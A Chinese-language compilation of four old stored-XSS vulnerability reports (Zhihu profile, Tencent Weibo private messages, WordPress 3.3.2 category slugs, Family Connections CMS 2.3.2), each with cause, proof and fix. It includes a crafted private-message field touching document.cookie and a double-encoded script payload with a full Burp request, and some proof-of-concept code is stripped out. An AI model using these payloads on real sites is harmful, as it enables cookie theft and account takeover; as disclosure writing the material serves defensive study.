下面是小编为大家收集的知乎一个存储型跨站漏洞及修复,本文共4篇,仅供参考,欢迎大家阅读,一起分享。本文原稿由网友“元翌”提供。
篇1:知乎一个存储型跨站漏洞及修复
简要描述:只做了简单的过滤,很容易绕过,
详细说明:个人简介过滤不严,在很多地方都会调用个人简介。
插入以上代码别人看到你个人主页,或者看到你回答的问题时等很多地方调用个人简介的地方就会触发,
写蠕虫的话,传播速度会很快。
漏洞证明:
修复方案:
输出时要强制转义呀……
篇2: 私信存储型XSS跨站漏洞漏洞预警
漏洞标题: 私信存储型XSS跨站漏洞
漏洞类型:xss跨站脚本攻击
危害等级:高
简要描述:
最近大家都流行连载了,
私信存储型XSS跨站漏洞漏洞预警
。那么我们也开场吧~最近心伤的胖子一直在连载,不知道发重复了没。
详细说明:
漏洞成因:
缺陷文件:
mat1.gtimg.com/www/mb/js/mi_121016.js
1.首先进入MI.TalkList.picEvent函数
MI.TalkList.picEvent=function(a){
....
其中a为页面中所有class为PicBox的div集合,即div.PicBox
2.循环每一个class为PicBox的div
for(varb=0,f=a.length;b
varg=a[b],
....
g为每个div
3.k=c(g,“img”)[0],获取PicBox里的第一个img图片
4.h=k.parentNode,获取k的父级元素,是一个链接
5.j=c(g,“.picTools”),获取PicBox这个div里的picToolsDIV
6.缺陷在下面这几句JS代码
if(!MI.user.fun.wideStyle)
MI.tmpl.picTool=['',_(“向左转”),'|',_(“向右转”),'',_(“查看原图”),“
”].join(“”);
UI.before(UI.html(MI.tmpl.picTool.replace(“$Url”,h.href.replace(/\\/460$/g,“”)).replace(“$hisUrl”,l))[0],h);
MI.tmpl.picTool直接将$Url替换为h.href
而h在取href属性值时,会自动将“等转换回”,<,>等符号,
----------------------------------
结合实际HTML结构,如下:
k对应用户发送的图片
h对应k外层的A标签
...
h.href中的“<,>等重新转义回了”,<,>
最终导致UI.html(MI.tmpl.picTool.replace(“$Url”,h.href.replace(/\\/460$/g,“”)).replace(“$hisUrl”,l))[0],h)
在输出HTML时,导致XSS出现
--------------------------------
利用方法,发送私信时,
api.t.qq.com/inbox/pm_mgr.php
sourcereply
ptidgainover
roomid
content.................
fid
arturlt2.qpic.cn/mblogpic/4955e75656b3d175296c/460#“>
(document.cookie);” style=“display:none”>
murl
targetgainover
funcsendefjs
pmlangzh_CN
apiType8
apiHostapi.t.qq.com
漏洞证明:
对方打开私信时会触发XSS。
修复方案:
MI.TalkList.picEvent中 h.href.replace之前先将h.href转义一次~
篇3:WordPress 3.3.2鸡肋存储型跨站漏洞的分析
WordPress最新版本3.3.2存在一个双字节编码的存储型跨站漏洞,可以bypass内置的filter机制,但是利用起来有点鸡肋
WordPress最新版本3.3.2存在一个双字节编码的存储型跨站漏洞,可以bypass内置的filter机制,但是利用起来有点鸡肋,细节如下:1:登录管理账户
2:单击分类
3:填写跨站参数,并用burp suite拦截请求
4:输入%253cscript%253ealert%25281%2529%253c%252fscript%253e可以直接bypass,
BURP请求数据包:
复制代码
代码如下:POST /wordpress/wp-admin/edit-tags.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:11.0) Gecko/0101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer:
www.jb51.net /wordpress/wp-admin/edit-tags.php?action=edit&taxonomy=link_category&tag_ID=2&post_type=post
Cookie:
wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1335544051%7C197b22093eaefaf6950bd81d6aa6372b;
wp-settings-time-1=1335371272; wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1335544051%7C6ebcb9d0104a37c6d7a91274ac94c6cb
Content-Type: application/x-www-form-urlencoded
Content-Length: 379
action=editedtag&tag_ID=2&taxonomy=link_category&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit-tags.php%3Ftaxonomy%3Dlink_category&_wpnonce=83974d7f8f&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fedit-tags.php%3Faction%3Dedit%26taxonomy%3Dlink_category%26tag_ID%3D2%26post_type%3Dpost&name=Blogroll&slug=injecthere%253cscript%253ealert%25281%2529%253c%252fscript%253e&description=sectest&submit=Update
小编:鸡肋,鸡肋中的鸡肋,minminmsn同学应该是翻译自国外的文章,没有经过详细的测试,wordpress默认的filter机制对管理员权限是不过滤的,所以不仅仅在分类里存在跨站,其他地方更是跨站多多,
也许有其他的猥琐的用途吧。
作者:freebuf
篇4:Family Connections CMS 2.3.2存储型跨站和XPath注入漏洞
Family Connections是一个开放源代码的内容管理系统,它可以容易和方便的创建私人家庭站点,Family Connections 2.3.2版存在存储型跨站和XPath注入漏洞可能导致敏感信息泄露。
[+]info:
~~~~~~~~~
Family Connections CMS 2.3.2 (POST) Stored XSS And XPath Injection
Vendor: Ryan Haudenschilt
Product web page: www.familycms.com
Affected version: 2.3.2
Vulnerability discovered by Gjoko LiquidWorm Krstic
liquidworm gmail com
Zero Science Lab - www.zeroscience.mk
[+]poc:
~~~~~~~~~
view source
print?
01
02 Family Connections CMS 2.3.2 Stored XSS And XPath Injection
03
04
08
09
10
11
Exploit XPath!
12
13
14
15
16
17
18
Exploit XSS!
19
[+]Reference:
~~~~~~~~~
www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5004.php